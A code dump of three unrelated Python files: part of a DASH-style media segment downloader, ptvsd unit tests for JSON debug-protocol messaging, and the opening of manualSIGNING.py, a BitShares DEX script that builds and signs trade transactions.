def _setup_signal_handling(self):
"""Setup interrupt signal handling."""
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGQUIT, self._signal_handler)
def _signal_handler(self, signum, frame):
"""Handle interrupt signals from user."""
self.exit()
def make_request(self, item):
"""Make a HTTP request for a single item within the playback queue."""
url = item['url']
headers = {}
if item['bytes_to'] != 0:
byte_range = 'bytes=%s-%s' % (item['bytes_from'], item['bytes_to'])
headers['Range'] = byte_range
try:
response = self.session.get(url, headers=headers,
timeout=float(self.options.timeout))
except requests.exceptions.Timeout as exception:
self.event('error', 'timeout: ' + str(exception))
response = None # Return a None value if timeout occurred
except requests.exceptions.ConnectionError as exception:
self.event('error', 'connection error: ' + str(exception))
response = None # Return a None value if connection has failed
if not self.options.keep_alive:
response.connection.close()
return response
def open_file(self, path):
"""Open a file and return the file handle."""
file_name = self.directory + path
return open(file_name, 'w')
def fetch_item(self, item, dummy=False):
"""
Fetch an individual item from a remote location.
Writes the item to file. Also updates the bandwidth based upon the
duration of the transaction and the amount of bits received in that
time.
Returns:
duration: time taken to fulfil the request
length: response length for use with the MPD '@bandwidth' value
(in bits).
"""
if not dummy:
self.event('start', 'downloading ' + str(item['url']))
response, duration = self._time_request(item)
if not response:
self.event('error', 'no response returned from '
+ str(item['url']) + '; writing to dummy file')
return self.fetch_item(item, dummy=True)
self._check_code(response.status_code, item['url'])
length = get_length(response)
path = self._write_to_file(item, response.content)
self.update_bandwidth(duration, length)
self.event('stop', 'downloading ' + str(item['url']) +
' (' + str(length) + 'b)')
return duration, length, path
else:
path = self._write_to_file(item, '')
return 0, 0, path
def item_ready(self, item):
"""Add a given item to the playback queue."""
self.managed_objects['playback'].add(item)
def retrieve_metric(self, metric, func=None):
"""Retrieve given metric from each of the managed objects."""
if func:
self._modify_state(func)
result = {}
for obj in ['download', 'playback']:
result[obj] = self.managed_objects[obj].__dict__[metric]
return result
def max_seg_duration(self):
"""Return maximum duration present in current set of representations."""
return self.managed_objects['representations'].max_seg_duration
def mpd_duration(self):
"""Return maximum duration present in current set of representations."""
return self.managed_objects['representations'].mpd_duration
def report_tick(self):
"""Call report method on each of the managed objects."""
self._modify_state('report_tick')
def _time_request(self, item):
"""Make request and time response."""
start = time.time()
response = self.make_request(item)
duration = time.time() - start
return response, duration
def _check_code(self, code, url):
"""Checks if the request was successful (using the HTTP error code)"""
if code >= 400:
self.event('error', 'could not download '
+ url + ' (code ' + str(code) + ')')
raise SystemExit()
def _write_to_file(self, item, content):
"""
Write response content to file.
This may be a complete file, or a byte range to an existing file.
"""
if self.options.write:
file_name = item['url'].split('/')[-1]
path = self.directory + '/downloads/' + file_name
file_start = int(item['bytes_from'])
file_end = int(item['bytes_to'])
try:
if os.path.isfile(path):
_file = open(path, 'r+')
else:
_file = open(path, 'w')
except IOError as exception:
self.event('error', 'could not append or write to file: '
+ str(exception))
return path
_file.seek(int(item['bytes_from']))
try:
_file.write(content)
except IOError as exception:
self.event('error', str(exception))
file_pointer = int(_file.tell() - 1)
if file_end != file_pointer and file_start != 0:
print 'ends do not match'
_file.close()
else:
path = ''
return path
def update_bandwidth(self, duration, length):
"""Update the current bandwidth estimation."""
if duration == 0 or length == 0:
pass
else:
self.bandwidth.change(int(length / duration))
def start_thread(self, target, args=(), **kwargs):
"""Wrapper for the `threading.Thread` module. Track threads."""
thread = threading.Thread(target=target, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
self.threads.append(thread)
return thread
def start_timed_thread(self, interval, function, args=()):
"""Wrapper for the `threading.Timer` module. Track threads."""
thread = threading.Timer(
interval=float(interval),
function=function, args=args)
thread.daemon = True
thread.start()
self.threads.append(thread)
return thread
def create_directory(self, path=''):
"""Create a new directory at the given path."""
path = self.directory + path
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exception:
self.event('error', 'could not create dir')
return path
def _create_progress_bar(self):
"""Create a progress bar if required."""
if not self.options.debug:
return progressbar.PlaybackBar(player=self,
max=self
.managed_objects['representations']
.mpd_duration)
else:
return progressbar.NullBar()
def event(self, action, event):
"""Register event with the reporting module."""
try:
self.managed_objects['reporter'].event(action, event)
except AttributeError:
print action, event
def get_length(response):
"""
Get length of response from HTTP response header.
Falls back to checking the length of the response content if value not
present in header. Also ensures that we convert from octets to bits for
use in the bandwidth estimation algorithm
"""
try:
length = int(response.headers.get('Content-Length'))
except TypeError:
length = len(response.content)
length = length * 8
return length
def remove_directory(path):
"""Remove an existing directory at the given path."""
if os.path.exists(path):
shutil.rmtree(path)
|
test_messaging.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import print_function, with_statement, absolute_import
import json
import io
import pytest
import random
import socket
import threading
import time
from ptvsd.messaging import JsonIOStream, JsonMessageChannel, Response
from .helpers.messaging import JsonMemoryStream, LoggingJsonStream
class TestJsonIOStream(object):
MESSAGE_BODY_TEMPLATE = u'{"arguments": {"threadId": 3}, "command": "next", "seq": %d, "type": "request"}'
MESSAGES = []
SERIALIZED_MESSAGES = b''
@classmethod
def setup_class(cls):
for seq in range(0, 3):
message_body = cls.MESSAGE_BODY_TEMPLATE % seq
message = json.loads(message_body)
message_body = message_body.encode('utf-8')
cls.MESSAGES.append(message)
message_header = u'Content-Length: %d\r\n\r\n' % len(message_body)
cls.SERIALIZED_MESSAGES += message_header.encode('ascii') + message_body
def test_read(self):
data = io.BytesIO(self.SERIALIZED_MESSAGES)
stream = JsonIOStream(data, data)
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(EOFError):
stream.read_json()
def test_write(self):
data = io.BytesIO()
stream = JsonIOStream(data, data)
for message in self.MESSAGES:
stream.write_json(message)
data = data.getvalue()
assert data == self.SERIALIZED_MESSAGES
class TestJsonMemoryStream(object):
MESSAGES = [
{'seq': 1, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 3}},
{'seq': 2, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 5}},
]
def test_read(self):
stream = JsonMemoryStream(self.MESSAGES, [])
for expected_message in self.MESSAGES:
message = stream.read_json()
assert message == expected_message
with pytest.raises(EOFError):
stream.read_json()
def test_write(self):
messages = []
stream = JsonMemoryStream([], messages)
for message in self.MESSAGES:
stream.write_json(message)
assert messages == self.MESSAGES
class TestJsonMessageChannel(object):
@staticmethod
def iter_with_event(collection):
"""Like iter(), but also exposes a threading.Event that is set
when the returned iterator is exhausted.
"""
exhausted = threading.Event()
def iterate():
for x in collection:
yield x
exhausted.set()
return iterate(), exhausted
def test_events(self):
EVENTS = [
{'seq': 1, 'type': 'event', 'event': 'stopped', 'body': {'reason': 'pause'}},
{'seq': 2, 'type': 'event', 'event': 'unknown', 'body': {'something': 'else'}},
]
events_received = []
class Handlers(object):
def stopped_event(self, channel, body):
events_received.append((channel, body))
def event(self, channel, event, body):
events_received.append((channel, event, body))
input, input_exhausted = self.iter_with_event(EVENTS)
stream = LoggingJsonStream(JsonMemoryStream(input, []))
channel = JsonMessageChannel(stream, Handlers())
channel.start()
input_exhausted.wait()
assert events_received == [
(channel, EVENTS[0]['body']),
(channel, 'unknown', EVENTS[1]['body']),
]
def test_requests(self):
REQUESTS = [
{'seq': 1, 'type': 'request', 'command': 'next', 'arguments': {'threadId': 3}},
{'seq': 2, 'type': 'request', 'command': 'unknown', 'arguments': {'answer': 42}},
{'seq': 3, 'type': 'request', 'command': 'pause', 'arguments': {'threadId': 5}},
]
requests_received = []
class Handlers(object):
def next_request(self, channel, arguments):
requests_received.append((channel, arguments))
return {'threadId': 7}
def request(self, channel, command, arguments):
requests_received.append((channel, command, arguments))
def pause_request(self, channel, arguments):
requests_received.append((channel, arguments))
raise RuntimeError('pause error')
input, input_exhausted = self.iter_with_event(REQUESTS)
output = []
stream = LoggingJsonStream(JsonMemoryStream(input, output))
channel = JsonMessageChannel(stream, Handlers())
channel.start()
input_exhausted.wait()
assert requests_received == [
(channel, REQUESTS[0]['arguments']),
(channel, 'unknown', REQUESTS[1]['arguments']),
(channel, REQUESTS[2]['arguments']),
]
assert output == [
{'seq': 1, 'type': 'response', 'request_seq': 1, 'command': 'next', 'success': True, 'body': {'threadId': 7}},
{'seq': 2, 'type': 'response', 'request_seq': 2, 'command': 'unknown', 'success': True},
{'seq': 3, 'type': 'response', 'request_seq': 3, 'command': 'pause', 'success': False, 'message': 'pause error'},
]
def test_responses(self):
request1_sent = threading.Event()
request2_sent = threading.Event()
request3_sent = threading.Event()
def iter_responses():
request1_sent.wait()
yield {'seq': 1, 'type': 'response', 'request_seq': 1, 'command': 'next', 'success': True, 'body': {'threadId': 3}}
request2_sent.wait()
yield {'seq': 2, 'type': 'response', 'request_seq': 2, 'command': 'pause', 'success': False, 'message': 'pause error'}
request3_sent.wait()
yield {'seq': 3, 'type': 'response', 'request_seq': 3, 'command': 'next', 'success': True, 'body': {'threadId': 5}}
stream = LoggingJsonStream(JsonMemoryStream(iter_responses(), []))
channel = JsonMessageChannel(stream, None)
channel.start()
# Blocking wait.
request1 = channel.send_request('next')
request1_sent.set()
response1 = request1.wait_for_response()
assert response1 == Response(True, 'next', body={'threadId': 3})
# Async callback, registered before response is received.
request2 = channel.send_request('pause')
response2 = [None]
response2_received = threading.Event()
def response2_handler(response):
response2[0] = response
response2_received.set()
request2.on_response(response2_handler)
request2_sent.set()
response2_received.wait()
assert response2[0] == Response(False, 'pause', error_message='pause error')
# Async callback, registered after response is received.
request3 = channel.send_request('next')
request3_sent.set()
request3.wait_for_response()
response3 = [None]
response3_received = threading.Event()
def response3_handler(response):
response3[0] = response
response3_received.set()
request3.on_response(response3_handler)
response3_received.wait()
assert response3[0] == Response(True, 'next', body={'threadId': 5})
def test_fuzz(self):
# Set up two channels over the same stream that send messages to each other
# asynchronously, and record everything that they send and receive.
# All records should match at the end.
class Fuzzer(object):
def __init__(self, name):
self.name = name
self.lock = threading.Lock()
self.sent = []
self.received = []
self.responses_sent = []
self.responses_received = []
def start(self, channel):
self._worker = threading.Thread(name=self.name, target=lambda: self._send_requests_and_events(channel))
self._worker.daemon = True
self._worker.start()
def wait(self):
self._worker.join()
def fizz_event(self, channel, body):
with self.lock:
self.received.append(('event', 'fizz', body))
def buzz_event(self, channel, body):
with self.lock:
self.received.append(('event', 'buzz', body))
def event(self, channel, event, body):
with self.lock:
self.received.append(('event', event, body))
def make_and_log_response(self, command):
x = random.randint(-100, 100)
if x >= 0:
response = Response(True, command, body=x)
else:
response = Response(False, command, error_message=str(x))
with self.lock:
self.responses_sent.append(response)
if response.success:
return x
else:
raise RuntimeError(response.error_message)
def fizz_request(self, channel, arguments):
with self.lock:
self.received.append(('request', 'fizz', arguments))
return self.make_and_log_response('fizz')
def buzz_request(self, channel, arguments):
with self.lock:
self.received.append(('request', 'buzz', arguments))
return self.make_and_log_response('buzz')
def request(self, channel, command, arguments):
with self.lock:
self.received.append(('request', command, arguments))
return self.make_and_log_response(command)
def _send_requests_and_events(self, channel):
pending_requests = [0]
for _ in range(0, 100):
typ = random.choice(('event', 'request'))
name = random.choice(('fizz', 'buzz', 'fizzbuzz'))
body = random.randint(0, 100)
with self.lock:
self.sent.append((typ, name, body))
if typ == 'event':
channel.send_event(name, body)
elif typ == 'request':
with self.lock:
pending_requests[0] += 1
req = channel.send_request(name, body)
def response_handler(response):
with self.lock:
self.responses_received.append(response)
pending_requests[0] -= 1
req.on_response(response_handler)
# Spin until we get responses to all requests.
while True:
with self.lock:
if pending_requests[0] == 0:
break
time.sleep(0.1)
fuzzer1 = Fuzzer('fuzzer1')
fuzzer2 = Fuzzer('fuzzer2')
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('localhost', 0))
_, port = server_socket.getsockname()
server_socket.listen(0)
socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket1_thread = threading.Thread(target=lambda: socket1.connect(('localhost', port)))
socket1_thread.start()
socket2, _ = server_socket.accept()
socket1_thread.join()
try:
io1 = socket1.makefile('rwb', 0)
io2 = socket2.makefile('rwb', 0)
stream1 = LoggingJsonStream(JsonIOStream(io1, io1))
channel1 = JsonMessageChannel(stream1, fuzzer1)
channel1.start()
fuzzer1.start(channel1)
stream2 = LoggingJsonStream(JsonIOStream(io2, io2))
channel2 = JsonMessageChannel(stream2, fuzzer2)
channel2.start()
fuzzer2.start(channel2)
fuzzer1.wait()
fuzzer2.wait()
finally:
socket1.close()
socket2.close()
assert fuzzer1.sent == fuzzer2.received
assert fuzzer2.sent == fuzzer1.received
assert fuzzer1.responses_sent == fuzzer2.responses_received
assert fuzzer2.responses_sent == fuzzer1.responses_received
|
manualSIGNING.py |
#=======================================================================
VERSION = 'Bitshares manualSIGNING 0.00000005'
#=======================================================================
# Authenticated BUY/SELL/CANCEL without Pybitshares(MIT) Architecture
' litepresence 2019 '
def WTFPL_v0_March_1765():
if any([stamps, licenses, taxation, regulation, fiat, etat]):
try:
print('no thank you')
except:
return [tar, feathers]
' ********** ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY ********* '
# Joe CEX algo trader finds Bitshares DEX and asks:
# How do I get good public API data that never goes stale?
' metaNODE.py'
# How do I authenticate?
' manualSIGNING.py '
# What nodes to use?
' latencyTEST.py'
# three 50KB scripts and DEX algo trading barriers to entry defeated
# nothing else to learn to be connected and authenticated
# buy/sell/cancel - six sigma connectivity - simple auth - cex like data
# need more?
# buy/sell/cancel + orderbooks UI
' microDEX.py '
# Algo Trading and Backtesting Engine
' extinctionEVENT.py '
# Historical Return on Investment
' accountBALANCES.py '
# whitepaper
' metaNODEwhitepaper.md'
' manualSIGNINGwhitepaper.md'
' ********************************************** '
' ****** API CHANGE IN VERSION 0.00000003 ****** '
' ********************************************** '
# order is now a dictionary of:
"['edicts', 'header', 'nodes']"
# see sample_orders() for examples
' NEW FEATURES '
# prototype_order() leverages metaNODE to build order header template
# edicts can be any mixed list of buy/sell/cancel
# autoscale buy/sell orders to account means if overbudget
# autoscale buy/sell orders to retain last two bitshares for fees
# multiprocessing ensures websockets and faulty orders timeout
# control_panel() advanced user controls to alter execution behaviors
# new edict {'op':login} matches wif to account name; returns True/False
# no pybitshares dependencies
' HOW DO I USE THIS THING? '
' from manualSIGNING import broker '
' broker(order) '
' OBJECTIVES '
'import only standard python objects' # DONE
'gather needed pybitshares objects: copy, paste, and cite' # DONE
'strip pybitshares objects of unused methods' # DONE
'restack classes and definitions chronologically' # DONE
'allow orders to be placed in human terms' # DONE
'build tx in graphene terms' # DONE
'serialize tx' # DONE
'validate serialization via get_transaction_hex_without_sig()' # DONE
'sign tx with ECDSA' # DONE
'validate signed tx' # DONE
'broadcast tx to rpc node' # DONE
'allow this script to be imported as module; broker(order)' # DONE
'allow list of buy/sell/cancel edicts' # DONE
'allow cancel-all' # DONE
'heavy line-by-line commentary' # DONE
'extinctionEVENT implementation' # DONE
'microDEX implementation' # DONE
'simplify and condense pybitshares methods' # ONGOING
'whitepaper readme.md' # 5200 word rough draft, editing ongoing
'convert from object-oriented (class) to procedural (def) style' # TODO
' DEPENDENCIES '
# python 3 on a linux box
# pip3 install: ecdsa, secp256k1, websocket-client
' LICENSE: '
# citations to pybitshares(MIT) & @xeroc where pertinent
# h/t @vvk123 @sschiessl @harukaff_bot
# remainder WTFPL March 1765
DEV = False
COLOR = True
' STANDARD PYTHON MODULES '
from time import time, ctime, mktime, strptime
from multiprocessing import Process, Value # encapsulate processes
from decimal import Decimal as decimal # higher precision than float
from json import dumps as json_dumps # serialize object to string
from json import loads as json_loads # deserialize string to object
from collections import OrderedDict
from traceback import format_exc # stack trace in terminal
from datetime import datetime
from calendar import timegm
from getpass import getpass # hidden input()
from random import shuffle
from pprint import pprint # pretty printing
import math
import sys
import os
' STANDARD CONVERSION UTILITIES '
from binascii import hexlify # binary text to hexidecimal
from binascii import unhexlify # hexidecimal to binary text
from zlib import decompress # aka gzip inflate; only used for logo
from hashlib import sha256 # message digest algorithm
from hashlib import new as hashlib_new # access algorithm library
from struct import pack # convert to string representation of C struct
from struct import unpack, unpack_from # convert back to PY variable
' NON STANDARD MODULES WHICH REQUIRE INSTALLATION '
print('sudo apt update')
print('sudo apt install python3-pip')
print('pip3 install websocket-client')
print('pip3 install secp256k1')
print('pip3 install ecdsa')
from websocket import create_connection as wss # handshake to node
from secp256k1 import PrivateKey as secp256k1_PrivateKey # class
from secp256k1 import PublicKey as secp256k1_PublicKey # class
from secp256k1 import ffi as secp256k1_ffi # compiled ffi object
from secp256k1 import lib as secp256k1_lib # library
from ecdsa import numbertheory as ecdsa_numbertheory # largest import
from ecdsa import VerifyingKey as ecdsa_VerifyingKey # class
from ecdsa import SigningKey as ecdsa_SigningKey # class
from ecdsa import SECP256k1 as ecdsa_SECP256k1 # curve
from ecdsa import util as ecdsa_util # module
from ecdsa import der as ecdsa_der # module
print("\033c") # clear screen if they are all installed
' litepresence/extinction-event MODULES '
from metaNODE import Bitshares_Trustless_Client
' LINUX AND PYTHON 3 REQUIRED '
# require a serious professional audience on linux/py3 installation
from sys import platform, version_info
if 'linux' not in platform:
raise Exception('not a linux box, format drive and try again...')
if version_info[0] < 3:
raise Exception("% is DED, long live Python 3.4+" % version_info[0])
' PRINT CONTROL '
def blockPrint():
# temporarily disable printing
sys.stdout = open(os.devnull, 'w')
def enablePrint():
# re-enable printing
sys.stdout = sys.__stdout__
def trace(e):
# print stack trace upon exception
msg = str(type(e).__name__) + '\n'
msg += str(e.args) + '\n'
msg += str(format_exc()) + '\n'
print(msg)
' GLOBALS '
def sample_orders():
global order1, order2, order3
# cancel all and place two buy orders
order1 = {
'edicts': [
{'op': 'buy',
'amount': 10.0,
'price': 0.00000100,
'expiration': 0},
{'op': 'buy',
'amount': 30.0,
'price': 0.00000150,
'expiration': 0},
],
'header': {'asset_id': '1.3.0',
'currency_id': '1.3.861',
'asset_precision': 5,
'currency_precision': 8,
'account_id': '1.2.x',
'account_name': '',
'wif': '',
},
'nodes': [
'wss://chicago.bitshares.apasia.tech/ws',
'wss://new-york.bitshares.apasia.tech/ws',
'wss://seattle.bitshares.apasia.tech/ws',
'wss://us-ny.bitshares.apasia.tech/ws',
'wss://us-la.bitshares.apasia.tech/ws',
]}
# cancel all
order2 = {
'edicts': [{'op': 'cancel',
'ids': ['1.7.X']}, # cancel all
# or cancel specific order numbers:
#{'op':'cancel',
#'ids':['1.7.101','1.7.102','1.7.103']},
],
'header': {'asset_id': '1.3.0',
'currency_id': '1.3.861',
'asset_precision': 5,
'currency_precision': 8,
'account_id': '1.2.x',
'account_name': '',
'wif': '',
},
'nodes': [
'wss://chicago.bitshares.apasia.tech/ws',
'wss://new-york.bitshares.apasia.tech/ws',
'wss://seattle.bitshares.apasia.tech/ws',
'wss://us-ny.bitshares.apasia.tech/ws',
'wss://us-la.bitshares.apasia.tech/ws',
]}
order3 = {
'edicts': [{'op': 'login'}
],
'header': {'asset_id': '1.3.0',
'currency_id': '1.3.861',
'asset_precision': 5,
'currency_precision': 8,
'account_id': '1.2.x',
'account_name': '',
'wif': '',
},
'nodes': [
'wss://chicago.bitshares.apasia.tech/ws',
'wss://new-york.bitshares.apasia.tech/ws',
'wss://seattle.bitshares.apasia.tech/ws',
'wss://us-ny.bitshares.apasia.tech/ws',
'wss://us-la.bitshares.apasia.tech/ws',
]}
def global_variables():
global info
info = {}
info['id'] = 1 # will be used to increment rpc request id
def global_constants():
global OP_IDS, OP_NAMES, ID, TYPES, SATOSHI, SIXSIG
global BASE58, HEXDIGITS, ISO8601, END_OF_TIME
# bitsharesbase/operationids.py
OP_IDS = {"Limit_order_create": 1,
"Limit_order_cancel": 2}
# swap keys/values to index names by number
OP_NAMES = {v: k for k, v in OP_IDS.items()}
# bitsharesbase/chains.py
ID = "4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8"
# bitsharesbase/objecttypes.py used by ObjectId() to confirm a.b.c
TYPES = {"account": 2, # 1.2.x
"asset": 3, # 1.3.x
"limit_order": 7} # 1.7.x
# base58 encoding and decoding; this is alphabet defined:
BASE58 = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# hex encoding and decoding
HEXDIGITS = "0123456789abcdefABCDEF"
# ISO8601 timeformat; 'graphene time'
ISO8601 = '%Y-%m-%dT%H:%M:%S%Z'
# MAX is 4294967295; year 2106 due to 4 byte unsigned integer
END_OF_TIME = 4 * 10 ** 9 # about 75 years in future
# very little
SATOSHI = decimal(0.00000001)
# almost 1
SIXSIG = decimal(0.999999)
def control_panel():
global HANDSHAKE_TIMEOUT, PROCESS_TIMEOUT, AUTOSCALE, BTS_FEES
global KILL_OR_FILL, ATTEMPTS, JOIN, LIMIT, DUST
' advanced user controls to alter execution behaviors '
# timeout during websocket handshake; default 4 seconds
HANDSHAKE_TIMEOUT = 4
# multiprocessing handler lifespan, default 20 seconds
PROCESS_TIMEOUT = 20
# default False for persistent limit orders
KILL_OR_FILL = False
# default True scales elements of oversize gross order to means
AUTOSCALE = True
# default True to never spend last 2 bitshares
BTS_FEES = True
# multiprocessing incarnations, default 3 attempts
ATTEMPTS = 3
# prevent extreme number of AI generated edicts; default 20
LIMIT = 20
# default True to execute order in primary script process
JOIN = True
# ignore orders value less than ~X bitshares; 0 to disable
DUST = 20
' COLOR TERMINAL '
def red(text):
return ('\033[91m' + text + '\033[0m') if COLOR else text
def green(text):
return ('\033[92m' + text + '\033[0m') if COLOR else text
def yellow(text):
return ('\033[93m' + text + '\033[0m') if COLOR else text
def blue(text):
return ('\033[94m' + text + '\033[0m') if COLOR else text
def purple(text):
return ('\033[105m' + text + '\033[0m') if COLOR else text
def cyan(text):
return ('\033[96m' + text + '\033[0m') if COLOR else text
' REMOTE PROCEDURE CALLS TO PUBLIC API NODES'
def wss_handshake():
# create a wss handshake in less than X seconds, else try again
print(purple('wss_handshake - node list is hard coded'))
print('in production use latencyTEST.py to generate list')
global ws, nodes # the websocket is created and node list shuffled
shuffle(nodes)
handshake = 999
while handshake > HANDSHAKE_TIMEOUT:
try:
try:
ws.close # attempt to close open stale connection
print(purple('connection terminated'))
except:
pass
start = time()
nodes.append(nodes.pop(0)) # rotate list
node = nodes[0]
print(purple('connecting:'), node)
ws = wss(node, timeout=HANDSHAKE_TIMEOUT)
handshake = (time() - start)
except:
continue
print(purple('connected:'), node, ws)
print('elapsed %.3f sec' % (time() - start))
def wss_query(params):
# this definition will place all remote procedure calls (RPC)
for i in range(10):
try:
# print(purple('RPC ' + params[0]), cyan(params[1]))
# this is the 4 part format of EVERY rpc request
# params format is ["location", "object", []]
query = json_dumps({"method": "call",
"params": params,
"jsonrpc": "2.0",
"id": 1})
# print(query)
# ws is the websocket connection created by wss_handshake()
# we will use this connection to send query and receive json
ws.send(query)
ret = json_loads(ws.recv())
try:
ret = ret['result'] # if there is result key take it
except:
pass
# print(ret)
# print('elapsed %.3f sec' % (time() - start))
return ret
except Exception as e:
try: # attempt to terminate the connection
ws.close()
except:
pass
trace(e) # tell me what happened
# switch nodes
wss_handshake()
continue
raise
def rpc_block_number():
# block number and block prefix
ret = wss_query(["database",
"get_dynamic_global_properties",
[]])
return ret
def rpc_account_id():
# given an account name return an account id
ret = wss_query(["database",
"lookup_accounts",
[account_name, 1]])
account_id = ret[0][1]
return account_id
def rpc_fees():
# returns fee for limit order create and cancel without 10^precision
query = ["database",
"get_required_fees", [[
['1', {"from": str(account_id)}],
['2', {"from": str(account_id)}]], "1.3.0"]]
ret = wss_query(query)
create = ret[0]['amount']
cancel = ret[1]['amount']
return {'create': create, 'cancel': cancel}
def rpc_balances():
balances = wss_query(["database",
"get_named_account_balances",
[account_name, [currency_id, asset_id, '1.3.0']]])
# print(balances)
for balance in balances:
if balance['asset_id'] == currency_id:
currency = decimal(balance['amount']) / 10 ** currency_precision
if balance['asset_id'] == asset_id:
assets = decimal(balance['amount']) / 10 ** asset_precision
if balance['asset_id'] == '1.3.0':
bitshares = decimal(balance['amount']) / 10 ** 5
# print(currency, assets, bitshares)
return currency, assets, bitshares
def rpc_open_orders():
# return a list of open orders, for one account, in one market
ret = wss_query(["database",
"get_full_accounts",
[[account_name], "false"]])
try:
limit_orders = ret[0][1]['limit_orders']
except:
limit_orders = []
market = [currency_id, asset_id]
orders = []
for order in limit_orders:
base_id = order['sell_price']['base']['asset_id']
quote_id = order['sell_price']['quote']['asset_id']
if (base_id in market) and (quote_id in market):
orders.append(order['id'])
return(orders)
def rpc_key_reference(public_key):
# given public key return account id
ret = wss_query(["database",
"get_key_references",
[[public_key]]])
return ret
def rpc_get_transaction_hex_without_sig(tx):
# use this to verify the manually serialized tx buffer
ret = wss_query(["database",
"get_transaction_hex_without_sig",
[tx]])
return bytes(ret, 'utf-8')
def rpc_broadcast_transaction(tx):
# upload the signed transaction to the blockchain
ret = wss_query(["network_broadcast",
"broadcast_transaction",
[tx]])
if ret is None:
print(yellow('*************************************'))
print('manualSIGNING' + red(' has placed your order'))
print(yellow('*************************************'))
return tx
pprint(ret)
return ret
' DATE FORMATTING '
def to_iso_date(unix):
# returns iso8601 datetime given unix epoch
iso = datetime.utcfromtimestamp(int(unix)).isoformat()
return iso
def from_iso_date(iso):
# returns unix epoch given iso8601 datetime
unix = int(timegm(strptime((iso + "UTC"), ISO8601)))
return unix
' GRAPHENEBASE TYPES ' # graphenebase/types.py
def types_README():
# graphenebase types use python "dunder" / "magic" methods
# these are a little abstract and under documented; to elucidate:
# bytes() is a "built in" function like str(), int(), list()
# it returns byte strings like: b'\x00\x00\x00'
# these methods will redefine the type of byte string
# returned by the "built in" bytes() in global space
# but only when bytes() is called on an object that has passed
# through a class with a "magic" __bytes__ method
# these methods are used to serialize OrderDicts of various elements
# graphenebase __str__() methods have been removed
# as they are unused for limit order operations
# Set() has been merged into Array()
# Bool() has been merged into Uint8()
# Varint32() has been merged into both Id() and Array()
'consider the following "magic method" example'
# this would have no effect on the way bytes() normally behaves
class normal():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return bytes(self.data)
# this redifines bytes() in global to pack unsigned 8 bit integers
# but only in the case of bytes(Uint8(x))
class Uint8():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return pack("<B", self.data)
# this is a definition method to accomplish the same "magic"
def bytes_Uint8(data):
return pack("<B", int(data))
# apply each of these methods to x=3 to show what happens
x = 3
print(bytes(x))
print(bytes(normal(x)))
print(bytes(Uint8(x)))
print(bytes_Uint8(x))
'''
# >>>
# b'\x00\x00\x00'
# b'\x00\x00\x00'
# b'\x03'
# b'\x03'
'''
class ObjectId():
# encodes a.b.c object ids - serializes the *instance* only!
def __init__(self, object_str, type_verify=None):
# if after splitting a.b.c there are 3 pieces:
if len(object_str.split(".")) == 3:
# assign those three pieces to a, b, and c
a, b, c = object_str.split(".")
# assure they are integers
self.a = int(a)
self.b = int(b)
self.c = int(c)
# serialize the c element; the "instance"
self.instance = Id(self.c)
self.abc = object_str
# 1.2.x:account, 1.3.x:asset, or 1.7.x:limit
if type_verify:
assert (TYPES[type_verify] == int(b)), (
# except raise error showing mismatch
"Object id does not match object type! " +
"Excpected %d, got %d" %
(TYPES[type_verify], int(b)))
else:
raise Exception("Object id is invalid")
def __bytes__(self):
# b'\x00\x00\x00' of serialized c element; the "instance"
return bytes(self.instance)
class Id():
# serializes the c element of "a.b.c" types
# merged with Varint32()
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return bytes(varint(self.data))
class Array():
# serializes lists as byte strings
# merged with Set() and Varint32()
def __init__(self, d):
self.data = d
self.length = int(len(self.data))
def __bytes__(self):
return bytes(varint(self.length)) + b"".join([bytes(a) for a in self.data])
class Uint8():
# byte string of 8 bit unsigned integers
# merged with Bool()
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return pack("<B", self.data)
class Uint16():
# byte string of 16 bit unsigned integers
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return pack("<H", self.data)
class Uint32():
# byte string of 32 bit unsigned integers
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return pack("<I", self.data)
class Int64():
# byte string of 64 bit unsigned integers
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return pack("<q", self.data)
class Signature():
# used to disable bytes() method on Signatures in OrderedDicts
def __init__(self, d):
self.data = d
def __bytes__(self):
return self.data # note does NOT return bytes(self.data)
class PointInTime():
# used to pack ISO8601 time as 4 byte unix epoch integer as bytes
def __init__(self, d):
self.data = d
def __bytes__(self):
return pack("<I", from_iso_date(self.data))
' VARINT '
def varint(n):
# varint encoding normally saves memory on smaller numbers
# yet retains ability to represent numbers of any magnitude
data = b''
while n >= 0x80:
data += bytes([(n & 0x7f) | 0x80])
n >>= 7
data += bytes([n])
return data
' BASE 58 ENCODE, DECODE, AND CHECK ' # graphenebase/base58.py
class Base58(object):
"""
This class serves as an abstraction layer
to deal with base58 encoded strings
and their corresponding hex and binary representation
"""
def __init__(self, data, prefix='BTS'):
print(green('Base58'))
print(blue(data))
self._prefix = prefix
if all(c in HEXDIGITS for c in data):
self._hex = data
elif data[0] == "5" or data[0] == "6":
self._hex = base58CheckDecode(data)
elif data[0] == "K" or data[0] == "L":
self._hex = base58CheckDecode(data)[:-2]
elif data[:len(self._prefix)] == self._prefix:
self._hex = gphBase58CheckDecode(data[len(self._prefix):])
else:
raise ValueError("Error loading Base58 object")
def __format__(self, _format):
if _format.upper() == 'BTS':
return _format.upper() + str(self)
else:
print("Format %s unkown. You've been warned!\n" % _format)
return _format.upper() + str(self)
def __repr__(self): # hex string of data
return self._hex
def __str__(self): # base58 string of data
return gphBase58CheckEncode(self._hex)
def __bytes__(self): # raw bytes of data
return unhexlify(self._hex)
def base58decode(base58_str):
print(green('base58decode'))
base58_text = bytes(base58_str, "ascii")
n = 0
